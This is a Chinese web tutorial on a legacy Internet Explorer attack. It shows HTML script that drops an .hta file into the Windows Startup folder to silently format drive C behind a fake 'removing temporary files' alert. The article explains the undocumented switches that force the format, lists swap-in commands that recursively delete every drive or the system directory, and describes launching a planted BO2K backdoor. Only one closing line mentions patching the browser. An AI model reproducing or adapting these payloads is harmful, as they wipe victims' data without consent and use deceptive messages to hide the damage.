如何利用HTML格式化你的硬盘_安全编程

这是利用微软( microsoft )的ie浏览器( internet explorer )所衍生出来的
攻击方法。

以下这段就是具有破坏性的html

hacking your computer .

scr.reset(); scr.path="c:\\windows\\start menu\\programs\\启动\\hack.hta";
scr.doc="
wsh.run('start.exe /m format c:/q /autotest /u');
alert('important : windows is removing unused temporary files.');";
scr.write();

(懂html的人应该就看得出来其中精随)

现在我大概来解释其中几个项目所写的意思

scr.path="c:\\windows\\start menu\\programs\\启动\\hack.hta"

这一项就是指当你看到这网页它会写入到你的电脑启动目录底下，并命名为
hack.hta

wsh.run('start.exe /m format c:/q /autotest /u');

通常要格式化硬碟都会先问你是否要执行，但其中的"/autotest"这项。

它是一个微软没有公开的功能，键入後format的动作便会被强制执行。

这项中的/q /u是令系统不需要检查硬碟便会立即执行的指令。

最後start.exe再配合/m选项可以使format的dos-prompt视窗在执行的时候处於最小
化的状态。

执行其他攻击指令的方法∶

只要修改“start.exe /m format c:/q /autotest /u”这一项便形。

start.exe /m format c:/q /autotest /u

其中的“c:”可以换做其他的硬碟。

(path)\bo2k.exe

执行它电脑中的某个程式，如果你有传bo2k到它电脑中就可以使用此指令。

start.exe /m deltree /y a:\*.* c:\*.* d:\*.*

杀掉对方硬碟底下所有的档案。

start.exe /m deltree /y c:\windows\system\*.*

杀掉对方c:\windows\system\目录底下的所有档案。

後叙∶

预防遭此手段的破坏就是到微软去更新你的浏览器。
cplic putlic eval 01oct2001 ao9mcpuff-lvju5bvtp-7xdvpsa4x-rrrckpv jjcpsuite-eval-3des-ng ck-cp

密码知识教程一

谈起密码算法，有的人会觉得陌生，但一提起pgp，大多数网上朋友都很熟悉，它是一个工具软件，向认证中心注册后就可以用它对文件进行加解密或数字签名，pgp所采用的是... [阅读全文]

网上保障隐私十大秘技

互联网是一把两刃利剑，一方面为日常生活带来便利，另一方面又为黑客入侵电脑系统开放更多渠道。一般网友应如何防范？请看下面能保障你隐私的十大秘技：　　　　1.采用... [阅读全文]

Win32下病毒设计入门

win32下病毒设计入门本文假定你对dos下的病毒和386pm有一定的了解。 1、感染任何一个病毒都需要有寄主，把病毒代码加入寄主程序中（伴侣病毒除外）。 ... [阅读全文]

自己动手清除电脑中的木马程序

特洛伊木马是一种基于远程控制的病毒程序，该程序具有很强的隐蔽性和危害性，它可以在你并不知情的的状态下控制你或者监视你的电脑。下面就讲讲木马经常藏身的地方和清除方... [阅读全文]

黑客破解口令常用的三种方法

通过破解获得系统管理员口令，进而掌握服务器的控制权，是黑客的一个重要手段。破解获得管理员口令的方法有很多，下面是三种最为常见的方法。　　(1)猜解简单口令：很... [阅读全文]

黑客秘籍：Windows下权限设置

随着动网论坛的广泛应用和动网上传漏洞的被发现以及sql注入式攻击越来越多的被使用，webshell让防火墙形同虚设，一台即使打了所有微软补丁、只让80端口对外开... [阅读全文]


验证码：

验证码：

如何利用HTML格式化你的硬盘

2024年05月19日 • 安全编程 •我要评论

相关文章:

发表评论